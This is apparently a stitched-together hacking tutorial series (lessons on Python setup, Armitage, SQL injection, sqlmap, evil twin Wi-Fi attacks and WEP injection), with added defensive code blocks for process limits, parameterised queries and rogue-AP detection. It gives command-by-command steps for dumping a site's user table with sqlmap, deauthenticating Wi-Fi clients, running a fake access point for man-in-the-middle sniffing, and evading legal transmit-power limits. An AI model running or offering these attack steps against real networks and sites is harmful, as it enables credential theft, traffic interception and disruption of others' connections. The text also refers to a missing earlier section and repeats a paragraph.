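The fork bomb above exhausts the process table only because nothing caps how many processes one user may own; on Linux that cap is the nproc limit set through pam_limits (/etc/security/limits.conf). As an added example, not part of the course, this evaluates a limits.conf-style policy for a given user and reports whether the bomb would be contained. It assumes pam_limits precedence of user entries over @group entries over the * default, and treats a later line as overriding an earlier one of the same class; the policy lines are constructed.

```python
"""Evaluate a limits.conf-style policy for the per-user process cap (nproc)
and report whether a fork bomb would be contained. Added example, not from the
course; POLICY is constructed. Assumes pam_limits precedence: user > @group > *."""

# Priority of a matching domain; lower wins.
USER, GROUP, DEFAULT = 0, 1, 2


def parse_limits(lines):
    """Parse '<domain> <type> <item> <value>' lines; comments and malformed
    lines are ignored, as pam_limits ignores them."""
    entries = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 4:
            continue
        domain, ltype, item, value = parts
        if ltype not in ("hard", "soft", "-"):      # '-' sets both soft and hard
            continue
        entries.append((domain, ltype, item, value))
    return entries


def effective_hard_limit(entries, user, groups, item="nproc"):
    """Return the hard limit for `item`: an int, the string 'unlimited',
    or None when no entry applies to this user at all."""
    best = None                                   # (priority, value)
    for domain, ltype, it, value in entries:
        if it != item or ltype == "soft":
            continue
        if domain == user:
            prio = USER
        elif domain.startswith("@") and domain[1:] in groups:
            prio = GROUP
        elif domain == "*":
            prio = DEFAULT
        else:
            continue                              # entry is for someone else
        # Assumption: a more specific class wins; same class, last line wins.
        if best is None or prio <= best[0]:
            best = (prio, value)
    if best is None:
        return None
    value = best[1]
    if value in ("unlimited", "-1"):
        return "unlimited"
    return int(value)


def fork_bomb_contained(entries, user, groups):
    """True only when a finite hard nproc limit applies to the user."""
    return isinstance(effective_hard_limit(entries, user, groups), int)


# Constructed policy: a sane default, an exemption for wheel, a tight cap for
# the build account, and an unrelated nofile line that must not interfere.
POLICY = [
    "# constructed limits.conf excerpt",
    "*        hard  nproc   4096",
    "@wheel   hard  nproc   unlimited",
    "build    -     nproc   512",
    "*        soft  nofile  1024",
]

if __name__ == "__main__":
    ents = parse_limits(POLICY)
    for who, grps in (("bob", ["users"]), ("alice", ["wheel"]), ("build", ["wheel"])):
        print(who, effective_hard_limit(ents, who, grps), fork_bomb_contained(ents, who, grps))
```

Note that root and anything started outside a PAM session (systemd services, cron on some setups) are not covered by limits.conf, so a limit here protects interactive logins, not the whole box.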
Lesson 10: Introduction to Python

Python is a very diverse programming language and is excellent to learn. Python is very diverse and compatible whatever operating system you are using. Today at codingsec we will run through an introductory tutorial to get you more familiar with how the fundamentals of the language work. The best way to learn to code is to actually put what you read today into practice!

Python is easy to learn:

print("Hello, World!")

Installing Python

In order to get started on learning Python, you will need to install the required software. For Python programming you need a working Python installation and a text editor. Python 3.0 was released in December 2008. To download the required software please visit http://www.python.org/download; you will find numerous download links there.

LINUX, BSD, AND UNIX USERS

You are probably lucky and Python is already installed on your machine. To test it, type python3 on a command line. If you see something like what is shown in the following section, you are set. If you have to install Python, first try to use the operating system's package manager or go to the repository where your packages are available and get Python 3. Ubuntu and Fedora do have Python 3 binary packages available, but they are not yet the default, so they need to be installed specially. Also IDLE (the Python editor) might be missing from the standard installation. Roughly, all the distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after downloading the source code.

If you want to (re-)install Python, here are the steps to compile Python on UNIX. Download the .tgz file (use your web browser to get the gzipped tar file from https://www.python.org/downloads/release/python-341). Uncompress the tar file (put in the correct path to where you downloaded it):

$ tar -xvzf ~/Download/Python-3.4.1.tgz
... list of files as they are uncompressed ...

Change to the directory and tell the computer to compile and install the program:

$ cd Python-3.4.1/
$ ./configure --prefix=$HOME/python3_install
... lots of output. Watch for error messages here ...
$ make
... even more output. Hopefully no error messages ...
$ make install

Add Python 3 to your path. You can test it first by specifying the full path. You should add $HOME/python3_install/bin to your PATH bash variable.

$ ~/python3_install/bin/python3
Python 3.4.1 (...) [GCC 4...] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

The above commands will install Python 3 to your home directory, which is probably what you want, but if you skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you need to make sure that the tk and tcl libraries, together with their development files, are installed on the system. You will get a warning during the make phase if these are not available.

MAC USERS

Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line terminal). Also IDLE (the Python editor) might be missing from the standard installation. If you want to (re-)install Python, get the macOS installer from the Python download site.

WINDOWS USERS

Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel chip). Start the installer by double-clicking it and follow the prompts. See https://docs.python.org/3/using/windows.html#installing-python for more information.

CONFIGURING YOUR PATH ENVIRONMENT VARIABLE

The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a program whenever you try to execute one by typing its name at a Command Prompt. You can see the current value of your PATH by typing this command at a Command Prompt:

echo %PATH%

The easiest way to permanently change environment variables is to bring up the built-in environment variable editor in Windows. How you get to this editor is slightly different on different versions of Windows.

On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel. Once you've opened the Control Panel, select View by: Large Icons, then click on System. In the window that pops up, click the Advanced System Settings link, then click the Environment Variables... button.

On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System Settings link, then click the Environment Variables... button.

On Windows XP: Right-click the My Computer icon on your desktop and select Properties. Select the Advanced tab, then click the Environment Variables... button.

Once you've brought up the environment variable editor, you'll do the same thing regardless of which version of Windows you're running. Under System Variables in the bottom half of the editor, find a variable called PATH. If there is one, select it and click Edit. Assuming your Python root is C:\Python34, add these two folders to your path (and make sure you get the semicolons right; there should be a semicolon between each folder in the list):

C:\Python34
C:\Python34\Scripts

Note: If you want to double-click and start your Python programs from a Windows folder and not have the console window disappear, you can add the following code to the bottom of each script:

print("Hello World")
#stops console from exiting
end_prog = ""
while end_prog != "q":
    end_prog = input("type q to quit")

INTERACTIVE MODE

Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:

Python 3.0 (r30:67503, Dec 29 2008, 21:31:07)
[GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is not visible on any external interface and no data is sent to or received from the Internet.
****************************************************************
IDLE 3.0
>>>

The >>> is Python's way of telling you that you are in interactive mode. In interactive mode what you type is immediately run. Try typing 1+1 in. Python will respond with 2. Interactive mode allows you to test out and see what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and try them out.

CREATING AND RUNNING PROGRAMS

Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that appears, type the following:

print("Hello, World!")

Now save the program: select File from the menu, then Save. Save it as "hello.py" (you can save it in any folder you want). Now that it is saved it can be run. Next run the program by going to Run then Run Module (or if you have an older version of IDLE use Edit then Run script). This will output Hello, World! on the *Python Shell* window.

PROGRAM FILE NAMES

It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird problems if you don't follow them for module names (modules will be discussed later).

Always save the program with the extension .py. Do not put another dot anywhere else in the file name.
Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
White space (" ") should not be used at all (use underscores instead).
Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
Do not use "non-English" characters (such as ä, ö, ü, å or ß) in your file names, or, even better, do not use them at all when programming.

USING PYTHON FROM THE COMMAND LINE

If you don't want to use Python from the command line, you don't have to; just use IDLE. To get into interactive mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a good Python mode) and then run it with python3 program_name.

RUNNING PYTHON PROGRAMS IN UNIX

If you are using Unix (such as Linux, Mac OS X, or BSD), and you make the program executable with chmod and have as the first line:

#!/usr/bin/env python3

you can run the Python program with ./hello.py like any other command. Thanks for learning!
Lesson 11: Introduction to Armitage

Installing Metasploit

Now Metasploit is not distributed with Kali Linux (it was distributed with BackTrack though). Kali has it in its repositories, and it can be easily downloaded and installed by executing:

apt-get install armitage

It will check dependencies, download the required files and install Armitage for you. After it's done, you can start Armitage with the following commands:

service postgresql start
service metasploit start
armitage

You will get a screen like this. Let the settings be as they are, and click Connect. You'll get a prompt like this (most of the time). Now you'll see Armitage making some connections for you. For a short while it might show failure messages (Connection Refused), but after some time Armitage will start, and you'll end up with a window somewhat like this.

Armitage Basics

Now the tough coding (honestly there wasn't anything tough about that) that you had to do with Metasploit becomes as easy as a click in Armitage. Now while I do believe that the developer has succeeded in making a tool which permits me to say "I'll take my leave, you can handle stuff from here", I'd still go on for a while, helping you know some basic stuff before I take my leave.

As a start, you should do a quick scan with OS detect. And while it does ask you to enter some stuff now, it is going to be pretty easy; you just have to follow the example given by Armitage with some modification. First do your old ifconfig in a new terminal to find your IP:

ifconfig

Notice that most of the time the first 6 digits are 192.168. You have to figure out the next 3 digits. Look at the sample it had provided, and most of the time you just have to copy that, replacing the 1 with 154 as in my case. Your final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs from 192.168.154.0 to 192.168.154.255. Most of the time you'll find your host in this range. Now, you may also use 192.168.0.0/16 to include all IPs from 192.168.0.0 through 192.168.255.255.

Now you can enter the IP into the Armitage window, and after a few seconds you will see the following message. Now a couple of computers with respective OS icons will show up on your screen. After that you'll have to go to Attacks -> Find attacks. After that, right-click on the computer you want to hack and you'll see an attack option. Select whichever you want to try and enter the requisites (you learnt how to do information gathering in the previous Metasploit tutorials). Everything will be quite easy, and it tells you exactly what you're supposed to do next. There's no rocket science here, and I'm not putting in any more screenshots. Better yet, you can see exactly what line of code is actually executed when you do something with your mouse. This is the automatically generated code after clicking OK.

As expected, the exploits in the attack section will be possible exploits that might or might not work. If you're expecting a click to hack you a Windows 7 machine, then that's just not happening. It might work with an unpatched XP machine: a ms03_026_dcom might do the trick, or the netapi one. Good luck with playing around with this tool. And here's the official Armitage website (media section link, useful vids and pics there) where you might find some more guidance, though the tool doesn't need any.

Lesson 12: SQL Injection Basics

SQL Injection: How It Works

Introduction

Let's get started at an apparently unrelated point. Now there are three main parts of a database management system, like SQL. They are:

- Creating the structure of tables
- Entering data
- Making queries (and getting meaningful results from data)

Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in a table with columns like Name, Company, Price, Screen Size, OS, etc. Now they allow you to create a query using some sort of user-friendly drop-down based form which lets you select your budget, preferred company, etc. So basically you, the user, can create queries and request data from their SQL servers. Now, while this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. Basically the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn't understand what to do and returns an error. This is a clear indication that with proper coding we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of usernames and passwords of all users on a website.

Let's assume we create a table in SQL. A vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the URL, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability. A URL ending in .php is a direct indication that the website/blog uses SQL to deliver a lot of its data, and that you can execute queries directly by changing the URL.

Steps

1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks.
2. Then we should obtain information about the SQL version and the number of tables in the database and columns in the tables.
3. Finally we have to extract the information from the tables.

Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial). For the 2nd and 3rd steps there are 2 ways to do them:

- Manually, using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself).
- Using some tool. Some tools help in making the process easier.

After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. For example, you can instruct the database to give you all the data from a table by executing the command:

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query "UserID=105" may not be true for all users, the condition 1=1 will always be true. So basically the query will be prompted to return all the data about the user for all the users for whom 1=1. Effectively, you have the usernames and passwords and all other information about all the users of the website. The first command is legitimate and gives you access to the data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to the data of all accounts.

In Kali Linux there is a great tool called SQLMap that we'll be using. I don't recommend all the GUI Windows tools which are found on malware-filled websites, and never work. You still have to use commands, but using tools is much more practical after you have an idea what is actually happening. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali Linux installed. That's it for this tutorial; you now know how SQL injections work. It might be worth your time learning some SQL on W3Schools till I come up with some other tutorial.
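The lesson's `UserId = 105 or 1=1` tautology only works because the user's input is glued into the SQL text. The following added example (not code from the course) shows the vulnerable string-built lookup beside its parameterised fix against an in-memory SQLite copy of the Users table, so you can see the first return every row and the second return none for the same payload. The Users rows are constructed.

```python
"""Vulnerable string-built query beside its parameterised fix, run against an
in-memory SQLite database. Added example, not from the course; the Users rows
are constructed."""
import sqlite3


def make_db():
    """Build the lesson's Users table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", [
        (105, "srinivas", "pw-one"),
        (106, "alice", "pw-two"),
        (107, "bob", "pw-three"),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """Concatenates the caller's input into the SQL text, so the input is
    parsed as SQL: '105 or 1=1' widens the WHERE clause to every row."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = " + user_id + " ORDER BY UserId"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Binds the input as a parameter: it is compared as a value, never parsed
    as SQL, so '105 or 1=1' is just a string that equals no UserId."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = ? ORDER BY UserId"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Run both lookups with the lesson's payload and a legitimate id."""
    conn = make_db()
    payload = "105 or 1=1"          # the tautology from the lesson
    return {
        "vulnerable": lookup_vulnerable(conn, payload),   # every row leaks
        "safe": lookup_safe(conn, payload),               # nothing matches
        "safe_legit": lookup_safe(conn, "105"),           # normal use still works
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The second defence a real application would add is validating that `user_id` is an integer before it reaches the query; parameter binding alone already stops the injection, but rejecting malformed ids early also gives you a clean log line to alert on.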
Using some tool: all throughout this blog we have used Kali Linux (the Windows GUI tools never work). That's it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial.

Lesson 13: More SQLMap

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database. The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-
- Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
- Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database. List of a few common enumeration commands: so first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

So the two databases are acuart and information schema. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command.

Table

Now we are obviously interested in acuart database. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data). The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, I hope you guys are starting to get the pattern by now. Its time we go one step ahead: now we will be getting data from one of the columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. Now we will be getting data from multiple columns. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

Here's the result. John Smith, of course. Email is email@email.com?? And the password is test. Okay, nothing great. While that hypothesis is not completely wrong, in the real world web pentesting you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up.

Lesson 14: Evil Twin

Evil Twin Tutorial

You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal-

apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps-
1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng for finding necessary info about the network, and airbase-ng to create its twin.
2. Forcing the client to disconnect from the real AP and connecting to yours. We'll use aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to our client.
4. Have fun: monitor traffic from the client, maybe hack into his computer using metasploit.

PS: The first 3 are primary objectives; the last one is optional and not a part of evil twin attack as such. It is rather a man in the middle attack.

[Picture credits : firewalls.com]

Information Gathering

airmon-ng

To see available wireless interfaces-

iwconfig

To start monitor mode on the available wireless interface (say wlan0)-

airmon-ng start wlan0

To capture packets from the air on monitor mode interface (mon0)

airodump-ng mon0

After about 30-40 seconds, press ctrl+c and leave the terminal as is. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of its ESSID and BSSID.

Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet.

Creating the twin

Open a new terminal. Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Replace them in given code-

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>

The interface would be mon0 (or whatever is the card you want to use). The only thing identical about the twins has to be their ESSIDs (which is the name of the network). However, it is better to keep all parameters same to make it look more real. Also, the BSSID can be randomly selected too, and doesn't have to match with the target. If you face any problems, a shorter code will be-

airbase-ng --essid <name of network> mon0

Remove the angular brackets (< & >) and choose any channel that you want. After you are done entering the parameters and running the command, you'll see that airbase turned your wireless adapter into an access point.

[Picture: Man in the middle attack. Pic Credits: owasp.net]

Telling the client to get lost

Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin. For this, the first part is to force it to disconnect. Aireplay will do that for us-

aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

The 0 specifies the time interval at which to send the deauth request. 0 means extremely fast, 1 would mean send a packet every 1 second, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, then your client would be disconnected in a matter of seconds, so fire up the command, and press ctrl+c after a few seconds only. Note that the deauth is sent on broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible, however.

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that-
1. Physically move closer to the client.
2. Power up your wireless card to transmit at more power.

Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support upto 30dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. Nevertheless, there is another option. In Bolivia, you can transmit at 30dBm, and by changing the regulatory domain, we can overcome the power limitation.

iw reg set BO
iwconfig wlan0 txpower 30

It is strongly advised to not break laws as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that of the real twin. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), you can leave him with no options.
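The three things the lesson relies on, a second BSSID advertising the same ESSID, a signal stronger than the real AP, and a burst of broadcast deauthentication frames, are also exactly what a wireless monitor can alert on. The following added example (not from the original tutorial) shows defender-side detection logic over constructed sample data; the scan rows, frame log, AP inventory and function names are all invented for this illustration, not a real capture or a real tool's output format.

```python
from collections import defaultdict

BROADCAST = "FF:FF:FF:FF:FF:FF"

# Constructed airodump-style scan (not a real capture): (BSSID, channel, power dBm, ESSID).
SAMPLE_SCAN = [
    ("AA:BB:CC:DD:EE:01", 6, -60, "HomeNet"),
    ("AA:BB:CC:DD:EE:02", 11, -72, "CoffeeShop"),
    ("DE:AD:BE:EF:00:01", 6, -35, "HomeNet"),  # same ESSID, unknown BSSID, much stronger
    ("AA:BB:CC:DD:EE:03", 1, -80, "Guest"),
]

# The administrator's own inventory: ESSID -> set of authorised BSSIDs.
KNOWN_APS = {"HomeNet": {"AA:BB:CC:DD:EE:01"}, "Guest": {"AA:BB:CC:DD:EE:03"}}

# Constructed management-frame log (not a real capture): (time s, subtype, source, destination).
# Twenty broadcast deauths 10 ms apart, spoofed from the real AP's BSSID, plus normal traffic.
SAMPLE_FRAMES = [(i * 0.01, "deauth", "AA:BB:CC:DD:EE:01", BROADCAST) for i in range(20)] + [
    (5.0, "deauth", "AA:BB:CC:DD:EE:02", "12:34:56:78:9A:BC"),  # one unicast deauth: normal
    (5.1, "beacon", "AA:BB:CC:DD:EE:01", BROADCAST),
]


def find_twins(scan, known_aps):
    """Flag every BSSID that advertises one of our ESSIDs without being in the inventory.

    The twin in the tutorial keeps the ESSID identical and may copy the channel and
    even the BSSID, so an ESSID served by an unlisted BSSID is the reliable signal;
    the power comparison records whether the rogue would win the client."""
    by_essid = defaultdict(list)
    for bssid, channel, power, essid in scan:
        by_essid[essid].append((bssid, channel, power))
    findings = []
    for essid, aps in by_essid.items():
        if essid not in known_aps:
            continue  # somebody else's network; nothing to defend
        legit = [p for b, _, p in aps if b in known_aps[essid]]
        for bssid, channel, power in aps:
            if bssid in known_aps[essid]:
                continue
            findings.append({
                "essid": essid, "rogue_bssid": bssid, "channel": channel,
                "rogue_power": power,
                "stronger_than_ours": not legit or power > max(legit),
            })
    return findings


def deauth_floods(frames, window_s=1.0, threshold=10):
    """Return [(source, peak count)] for sources that send more than `threshold`
    broadcast deauthentication frames inside any `window_s`-second window.

    aireplay-ng --deauth 0 sends them as fast as it can to the broadcast address,
    which no legitimate AP does at that rate."""
    times = defaultdict(list)
    for t, subtype, src, dst in frames:
        if subtype == "deauth" and dst == BROADCAST:
            times[src].append(t)
    floods = []
    for src, ts in times.items():
        ts.sort()
        peak, j = 0, 0
        for i, start in enumerate(ts):  # sliding window over sorted timestamps
            while j < len(ts) and ts[j] - start <= window_s:
                j += 1
            peak = max(peak, j - i)
        if peak > threshold:
            floods.append((src, peak))
    return sorted(floods)


if __name__ == "__main__":
    for f in find_twins(SAMPLE_SCAN, KNOWN_APS):
        print("possible evil twin:", f)
    for src, n in deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood from {src}: {n} broadcast deauths in 1 s")
```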
Powering up the card (the latter option) can be done with the following command -

iwconfig wlan0 txpower 27

Here 27 is the transmission power in dBm.

Note : If you are unable to get your client to connect to you, keep the deauth packets going; he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.

Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0. However, a 3G modem will show up as ppp0. You just have to know which interface is providing you with internet.

Interfaces
- x0 - This has internet access.
- at0 - This is created by airbase-ng (wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net.
- evil - This is an interface that we will create, whose job will be to actually bridge the networks.

Creating evil

We will use Bridge control utility provided by Kali, brctl. Execute the following code-

brctl addbr evil

This will create the bridge. Now we have to specify which two interfaces have to be bridged-

brctl addif evil x0
brctl addif evil at0

We can assign an IP to the interfaces and bring them up using-

ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up

Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times)

ifconfig evil up

Now to auto configure all the complicated DHCP settings, we'll use dhclient.

dhclient3 evil &

Finally, all the configurations have been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. Officially, the evil twin attack is complete. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM). I will give you some idea what you can do, for the time being.

Sniffing using Wireshark

Now all the packets that go from the user to the internet pass through our evil interface, and these packets can be monitored via wireshark. However, since it is a GUI tool, I won't teach you how to use it here, and I'll write a detailed tutorial for it later. You can take a look at their website to get an idea on how to use wireshark.

http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html

[Pic credits: The picture on the right has been directly taken from their website.]

Lesson 15: Ad-Hoc Networks (Pentesting yourself the legal way)

Create A Wireless Ad-Hoc Network on Windows 8 Using command line

For the hackers

This article is relevant and important here since the best way to start with hacking is to practice on yourself. You are going to need two adapters for this task: one on Windows which will create the network, and another on Kali Linux which will hack the network. This article concentrates only on the former part of the exercise, and we'll only create an ad-hoc network here. So non-hackers too can follow from here on.

For everyone

This method works with all versions of Windows.
1. Get access to an elevated command prompt (with administrator privileges). [On Windows 8 : Press Windows key + X or hover your mouse to the lowermost corner on the left part of the screen and right click. Then click "Command Prompt Admin".]
2. Now type netsh wlan show drivers
3. If the hosted network supported says yes, move on to the next step
4. Now type - netsh wlan set hostednetwork mode=allow ssid=<enter_network_name_here> key=<enter_password_here>
5. Finally type netsh wlan start hostednetwork. Your ad-hoc network is ready.

Lesson 16: Creating a dummy Wi-Fi network for pentesting

Creating A dummy wifi for hacking

What you'll need

At least 2 wireless adapters. I've got three. First one is the internal adapter which came with my laptop. The other 2 are DLink adapters. This is what it looks like. [Picture: My Dlink Adapter] Please note that a wireless adapter can only be used by only one machine at a time.

What now

Now since we have multiple adapters, we can use one of them to create a wireless network on Windows and then practice hacking it on a virtual Kali Linux machine. This is what it looks like on my Windows machine (I blurred the names a bit. Its a sort of convention I guess). This is our newly created network. Now we can turn on our Kali machine and see if it is discovered there. So it showed up pretty fine. We can use netsh to modify the security parameters as necessary (WEP, WPA, etc.) and practice our hacking skills on our dummy wifi network.

Lesson 17: Speeding up WEP Hacking in Kali Linux

Speeding Up WEP Hacking In Kali

Now if you have followed the basic WEP hacking tutorial, then you are ready to proceed to the stage where you follow an intermediate level hacking tutorial. In this tutorial, we will look at the intricate details of what is happening and approach the complicated methods and concepts. To start with, I'll address a common question.

14 March 2014 19:28: "I couldn't find any wlan when I write ifconfig in terminal"

1. Are you using Kali Linux on a virtual machine? This question has been discussed at length on superuser forums. The conclusion is that you can't directly connect internal wifi card using any Virtual machine software-

"Unfortunately no virtualization software allows for direct access to hardware devices like that. Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. Your host machine has access to the wireless adapter, not the virtual machine. Everything else is abstracted through the virtualization engine. The only devices that can be directly accessed are usb devices (though you could argue that the vm has lower level access to cd rom's and storage devices). I wish I could give you a better answer."

Basically you have to buy an external wireless card. A virtual machine can only use computer hardware if it is externally connected via USB. If that's not a possibility, you can side install Kali with Windows or run it via a USB.

Now there is another catch here. The internal adapters, almost all of them, don't support injection. This is extremely important for speeding up wireless hacking. So if you really want to go in depth of wireless hacking, then its time to buy an external adapter or two (the more the better). They aren't very expensive. I personally use two of them myself. If you want to see what I use, take a look here.

http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html

So basically you have 2 choices. First, you can buy a new external wireless adapter (no referral links here). Secondly, you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this, but it might be possible), but still, that is more work than simply to buy a usb wireless card.

Kali Linux

I don't know why it needs mention here, but if you don't have Kali Linux (or Backtrack) installed yet, you will have to install it before you can start this tutorial.

Check Injection Support

Aircrack-ng has a comprehensive article related to checking injection support. You might check their website out for it. I am just providing the commands which will be enough to find out whether injection is working or not. From now we'll refer to wlan0/wlan1 as mon0.

airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666

The first command basically sets up a temporary server sort of thing that is waiting for you to test your injection capabilities. 127.0.0.1 is the IP which is reserved for loopback. It is always used when you are carrying out some command on yourself. Again, what follows an IP and a colon is the port. The general form is somewhat like IP:port. 666 is the port we are using. The second command actually tries to inject the server, and succeeds, and the last line "Injection is working!" should bring a smile to your face. If not, you'll have to buy a card which supports injection, or see some forum posts which will help you figure something out. There is information regarding the same in the same aircrack-ng tutorial.

Check Signal Strength

While the basic hacking methods from the previous post don't have any real strength restriction, most of the time you need to be physically close to the access point in order to inject packets. So finally you have checked your injection capabilities. At this stage, I'm gonna summarize what you have to do here. First,

airmon-ng start wlan0 [or wlan1]

